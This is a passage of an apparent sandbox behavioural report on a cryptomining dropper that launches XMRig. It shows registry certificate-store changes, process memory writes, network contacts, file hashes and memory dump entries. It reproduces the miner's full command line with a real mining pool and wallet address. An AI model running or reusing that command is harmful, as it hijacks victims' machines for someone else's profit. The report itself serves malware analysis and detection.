| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 | C:\Users\Admin\AppData\Local\Temp\main.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Users\Admin\AppData\Local\Temp\main.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef453000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Users\Admin\AppData\Local\Temp\main.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 3904 wrote to memory of 1732 | N/A | C:\Users\Admin\AppData\Local\Temp\main.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
| PID 3904 wrote to memory of 1732 | N/A | C:\Users\Admin\AppData\Local\Temp\main.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\main.exe
"C:\Users\Admin\AppData\Local\Temp\main.exe"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 209.205.72.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 144.107.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| NL | 23.62.61.155:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 155.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.35.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 95.179.241.203:80 | pool.hashvault.pro | tcp |
| US | 8.8.8.8:53 | 203.241.179.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 28.118.140.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 50.23.12.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.39.242.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 139.53.16.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.197.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 19.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.173.189.20.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
| MD5 | e2fe87cc2c7dab8ca6516620dccd1381 |
| SHA1 | f714ec0448325435103519452610cf7aadf8bbba |
| SHA256 | d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4 |
| SHA512 | 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6 |
memory/1732-16-0x0000023B36FD0000-0x0000023B36FF0000-memory.dmp
memory/1732-17-0x0000023B37020000-0x0000023B37040000-memory.dmp
memory/1732-18-0x00007FF70F1F0000-0x00007FF70FCF3000-memory.dmp
memory/1732-20-0x0000023B38910000-0x0000023B38930000-memory.dmp
memory/1732-19-0x0000023B37040000-0x0000023B37060000-memory.dmp
memory/1732-21-0x00007FF70F1F0000-0x00007FF70FCF3000-memory.dmp
memory/1732-22-0x00007FF70F1F0000-0x00007FF70FCF3000-memory.dmp
memory/1732-23-0x00007FF70F1F0000-0x00007FF70FCF3000-memory.dmp
memory/1732-24-0x0000023B37040000-0x0000023B37060000-memory.dmp
memory/1732-25-0x0000023B38910000-0x0000023B38930000-memory.dmp
memory/1732-26-0x00007FF70F1F0000-0x00007FF70FCF3000-memory.dmp
memory/1732-27-0x00007FF70F1F0000-0x00007FF70FCF3000-memory.dmp
memory/1732-28-0x00007FF70F1F0000-0x00007FF70FCF3000-memory.dmp
memory/1732-29-0x00007FF70F1F0000-0x00007FF70FCF3000-memory.dmp
memory/1732-30-0x00007FF70F1F0000-0x00007FF70FCF3000-memory.dmp
memory/1732-31-0x00007FF70F1F0000-0x00007FF70FCF3000-memory.dmp
memory/1732-32-0x00007FF70F1F0000-0x00007FF70FCF3000-memory.dmp
memory/1732-33-0x00007FF70F1F0000-0x00007FF70FCF3000-memory.dmp
memory/1732-34-0x00007FF70F1F0000-0x00007FF70FCF3000-memory.dmp
memory/1732-35-0x00007FF70F1F0000-0x00007FF70FCF3000-memory.dmp
memory/1732-36-0x00007FF70F1F0000-0x00007FF70FCF3000-memory.dmp
memory/1732-37-0x00007FF70F1F0000-0x00007FF70FCF3000-memory.dmp
memory/1732-38-0x00007FF70F1F0000-0x00007FF70FCF3000-memory.dmp
memory/1732-39-0x00007FF70F1F0000-0x00007FF70FCF3000-memory.dmp
memory/1732-40-0x00007FF70F1F0000-0x00007FF70FCF3000-memory.dmp
memory/1732-41-0x00007FF70F1F0000-0x00007FF70FCF3000-memory.dmp
memory/1732-42-0x00007FF70F1F0000-0x00007FF70FCF3000-memory.dmp
memory/1732-43-0x00007FF70F1F0000-0x00007FF70FCF3000-memory.dmp
memory/1732-44-0x00007FF70F1F0000-0x00007FF70FCF3000-memory.dmp
memory/1732-45-0x00007FF70F1F0000-0x00007FF70FCF3000-memory.dmp
memory/1732-46-0x00007FF70F1F0000-0x00007FF70FCF3000-memory.dmp
memory/1732-47-0x00007FF70F1F0000-0x00007FF70FCF3000-memory.dmp
memory/1732-48-0x00007FF70F1F0000-0x00007FF70FCF3000-memory.dmp
memory/1732-49-0x00007FF70F1F0000-0x00007FF70FCF3000-memory.dmp
memory/1732-50-0x00007FF70F1F0000-0x00007FF70FCF3000-memory.dmp
memory/1732-51-0x00007FF70F1F0000-0x00007FF70FCF3000-memory.dmp
memory/1732-52-0x00007FF70F1F0000-0x00007FF70FCF3000-memory.dmp
memory/1732-53-0x00007FF70F1F0000-0x00007FF70FCF3000-memory.dmp
memory/1732-54-0x00007FF70F1F0000-0x00007FF70FCF3000-memory.dmp
memory/1732-55-0x00007FF70F1F0000-0x00007FF70FCF3000-memory.dmp
memory/1732-56-0x00007FF70F1F0000-0x00007FF70FCF3000-memory.dmp
memory/1732-57-0x00007FF70F1F0000-0x00007FF70FCF3000-memory.dmp
memory/1732-58-0x00007FF70F1F0000-0x00007FF70FCF3000-memory.dmp
memory/1732-59-0x00007FF70F1F0000-0x00007FF70FCF3000-memory.dmp
memory/1732-60-0x00007FF70F1F0000-0x00007FF70FCF3000-memory.dmp
memory/1732-61-0x00007FF70F1F0000-0x00007FF70FCF3000-memory.dmp
memory/1732-62-0x00007FF70F1F0000-0x00007FF70FCF3000-memory.dmp
memory/1732-63-0x00007FF70F1F0000-0x00007FF70FCF3000-memory.dmp
memory/1732-64-0x00007FF70F1F0000-0x00007FF70FCF3000-memory.dmp
memory/1732-65-0x00007FF70F1F0000-0x00007FF70FCF3000-memory.dmp
memory/1732-66-0x00007FF70F1F0000-0x00007FF70FCF3000-memory.dmp
memory/1732-67-0x00007FF70F1F0000-0x00007FF70FCF3000-memory.dmp
memory/1732-68-0x00007FF70F1F0000-0x00007FF70FCF3000-memory.dmp
memory/1732-69-0x00007FF70F1F0000-0x00007FF70FCF3000-memory.dmp
memory/1732-70-0x00007FF70F1F0000-0x00007FF70FCF3000-memory.dmp
memory/1732-71-0x00007FF70F1F0000-0x00007FF70FCF3000-memory.dmp
memory/1732-72-0x00007FF70F1F0000-0x00007FF70FCF3000-memory.dmp
memory/1732-73-0x00007FF70F1F0000-0x00007FF70FCF3000-memory.dmp
memory/1732-74-0x00007FF70F1F0000-0x00007FF70FCF3000-memory.dmp
memory/1732-75-0x00007FF70F1F0000-0x00007FF70FCF3000-memory.dmp
memory/1732-76-0x00007FF70F1F0000-0x00007FF70FCF3000-memory.dmp
memory/1732-77-0x00007FF70F1F0000-0x00007FF70FCF3000-memory.dmp
memory/1732-78-0x00007FF70F1F0000-0x00007FF70FCF3000-memory.dmp
memory/1732-79-0x00007FF70F1F0000-0x00007FF70FCF3000-memory.dmp
memory/1732-80-0x00007FF70F1F0000-0x00007FF70FCF3000-memory.dmp
memory/1732-81-0x00007FF70F1F0000-0x00007FF70FCF3000-memory.dmp
memory/1732-82-0x00007FF70F1F0000-0x00007FF70FCF3000-memory.dmp
memory/1732-83-0x00007FF70F1F0000-0x00007FF70FCF3000-memory.dmp
memory/1732-84-0x00007FF70F1F0000-0x00007FF70FCF3000-memory.dmp
Analysis: behavioral4
Detonation Overview
Submitted
2024-05-22 19:05
Reported
2024-05-22 19:53
Platform
win10v2004-20240426-en
Max time kernel
1796s
Max time network
1801s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2512 wrote to memory of 3204 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (3) - Copy.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
| PID 2512 wrote to memory of 3204 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (3) - Copy.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy (3) - Copy.exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy (3) - Copy.exe"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 217.106.137.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | github.com | udp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 160.83.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| NL | 23.62.61.194:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 194.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 22.160.190.20.in-addr.arpa | udp |
| NL | 23.62.61.194:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 149.220.183.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 95.179.241.203:80 | pool.hashvault.pro | tcp |
| US | 8.8.8.8:53 | 203.241.179.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 196.249.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.86.106.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 157.123.68.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.187.3.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 145.83.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 19.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 170.117.168.52.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
| MD5 | e2fe87cc2c7dab8ca6516620dccd1381 |
| SHA1 | f714ec0448325435103519452610cf7aadf8bbba |
| SHA256 | d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4 |
| SHA512 | 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6 |
memory/3204-16-0x00000223EE840000-0x00000223EE860000-memory.dmp
memory/3204-17-0x00000223F0230000-0x00000223F0250000-memory.dmp
memory/3204-18-0x00007FF7F94B0000-0x00007FF7F9FB3000-memory.dmp
memory/3204-19-0x00000223F0250000-0x00000223F0270000-memory.dmp
memory/3204-20-0x00000223F0270000-0x00000223F0290000-memory.dmp
memory/3204-21-0x00007FF7F94B0000-0x00007FF7F9FB3000-memory.dmp
memory/3204-22-0x00007FF7F94B0000-0x00007FF7F9FB3000-memory.dmp
memory/3204-23-0x00000223F0250000-0x00000223F0270000-memory.dmp
memory/3204-25-0x00000223F0270000-0x00000223F0290000-memory.dmp
memory/3204-24-0x00007FF7F94B0000-0x00007FF7F9FB3000-memory.dmp
memory/3204-26-0x00007FF7F94B0000-0x00007FF7F9FB3000-memory.dmp
memory/3204-27-0x00007FF7F94B0000-0x00007FF7F9FB3000-memory.dmp
memory/3204-28-0x00007FF7F94B0000-0x00007FF7F9FB3000-memory.dmp
memory/3204-29-0x00007FF7F94B0000-0x00007FF7F9FB3000-memory.dmp
memory/3204-30-0x00007FF7F94B0000-0x00007FF7F9FB3000-memory.dmp
memory/3204-31-0x00007FF7F94B0000-0x00007FF7F9FB3000-memory.dmp
memory/3204-32-0x00007FF7F94B0000-0x00007FF7F9FB3000-memory.dmp
memory/3204-33-0x00007FF7F94B0000-0x00007FF7F9FB3000-memory.dmp
memory/3204-34-0x00007FF7F94B0000-0x00007FF7F9FB3000-memory.dmp
memory/3204-35-0x00007FF7F94B0000-0x00007FF7F9FB3000-memory.dmp
memory/3204-36-0x00007FF7F94B0000-0x00007FF7F9FB3000-memory.dmp
memory/3204-37-0x00007FF7F94B0000-0x00007FF7F9FB3000-memory.dmp
memory/3204-38-0x00007FF7F94B0000-0x00007FF7F9FB3000-memory.dmp
memory/3204-39-0x00007FF7F94B0000-0x00007FF7F9FB3000-memory.dmp
memory/3204-40-0x00007FF7F94B0000-0x00007FF7F9FB3000-memory.dmp
memory/3204-41-0x00007FF7F94B0000-0x00007FF7F9FB3000-memory.dmp
memory/3204-42-0x00007FF7F94B0000-0x00007FF7F9FB3000-memory.dmp
memory/3204-43-0x00007FF7F94B0000-0x00007FF7F9FB3000-memory.dmp
memory/3204-44-0x00007FF7F94B0000-0x00007FF7F9FB3000-memory.dmp
memory/3204-45-0x00007FF7F94B0000-0x00007FF7F9FB3000-memory.dmp
memory/3204-46-0x00007FF7F94B0000-0x00007FF7F9FB3000-memory.dmp
memory/3204-47-0x00007FF7F94B0000-0x00007FF7F9FB3000-memory.dmp
memory/3204-48-0x00007FF7F94B0000-0x00007FF7F9FB3000-memory.dmp
memory/3204-49-0x00007FF7F94B0000-0x00007FF7F9FB3000-memory.dmp
memory/3204-50-0x00007FF7F94B0000-0x00007FF7F9FB3000-memory.dmp
memory/3204-51-0x00007FF7F94B0000-0x00007FF7F9FB3000-memory.dmp
memory/3204-52-0x00007FF7F94B0000-0x00007FF7F9FB3000-memory.dmp
memory/3204-53-0x00007FF7F94B0000-0x00007FF7F9FB3000-memory.dmp
memory/3204-54-0x00007FF7F94B0000-0x00007FF7F9FB3000-memory.dmp
memory/3204-55-0x00007FF7F94B0000-0x00007FF7F9FB3000-memory.dmp
memory/3204-56-0x00007FF7F94B0000-0x00007FF7F9FB3000-memory.dmp
memory/3204-57-0x00007FF7F94B0000-0x00007FF7F9FB3000-memory.dmp
memory/3204-58-0x00007FF7F94B0000-0x00007FF7F9FB3000-memory.dmp
memory/3204-59-0x00007FF7F94B0000-0x00007FF7F9FB3000-memory.dmp
memory/3204-60-0x00007FF7F94B0000-0x00007FF7F9FB3000-memory.dmp
memory/3204-61-0x00007FF7F94B0000-0x00007FF7F9FB3000-memory.dmp
memory/3204-62-0x00007FF7F94B0000-0x00007FF7F9FB3000-memory.dmp
memory/3204-63-0x00007FF7F94B0000-0x00007FF7F9FB3000-memory.dmp
memory/3204-64-0x00007FF7F94B0000-0x00007FF7F9FB3000-memory.dmp
memory/3204-65-0x00007FF7F94B0000-0x00007FF7F9FB3000-memory.dmp
memory/3204-66-0x00007FF7F94B0000-0x00007FF7F9FB3000-memory.dmp
memory/3204-67-0x00007FF7F94B0000-0x00007FF7F9FB3000-memory.dmp
memory/3204-68-0x00007FF7F94B0000-0x00007FF7F9FB3000-memory.dmp
memory/3204-69-0x00007FF7F94B0000-0x00007FF7F9FB3000-memory.dmp
memory/3204-70-0x00007FF7F94B0000-0x00007FF7F9FB3000-memory.dmp
memory/3204-71-0x00007FF7F94B0000-0x00007FF7F9FB3000-memory.dmp
memory/3204-72-0x00007FF7F94B0000-0x00007FF7F9FB3000-memory.dmp
memory/3204-73-0x00007FF7F94B0000-0x00007FF7F9FB3000-memory.dmp
memory/3204-74-0x00007FF7F94B0000-0x00007FF7F9FB3000-memory.dmp
memory/3204-75-0x00007FF7F94B0000-0x00007FF7F9FB3000-memory.dmp
memory/3204-76-0x00007FF7F94B0000-0x00007FF7F9FB3000-memory.dmp
memory/3204-77-0x00007FF7F94B0000-0x00007FF7F9FB3000-memory.dmp
memory/3204-78-0x00007FF7F94B0000-0x00007FF7F9FB3000-memory.dmp
memory/3204-79-0x00007FF7F94B0000-0x00007FF7F9FB3000-memory.dmp
memory/3204-80-0x00007FF7F94B0000-0x00007FF7F9FB3000-memory.dmp
memory/3204-81-0x00007FF7F94B0000-0x00007FF7F9FB3000-memory.dmp
memory/3204-82-0x00007FF7F94B0000-0x00007FF7F9FB3000-memory.dmp
memory/3204-83-0x00007FF7F94B0000-0x00007FF7F9FB3000-memory.dmp
memory/3204-84-0x00007FF7F94B0000-0x00007FF7F9FB3000-memory.dmp
Analysis: behavioral7
Detonation Overview
Submitted
2024-05-22 19:05
Reported
2024-05-22 20:01
Platform
win10v2004-20240426-en
Max time kernel
1791s
Max time network
1801s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
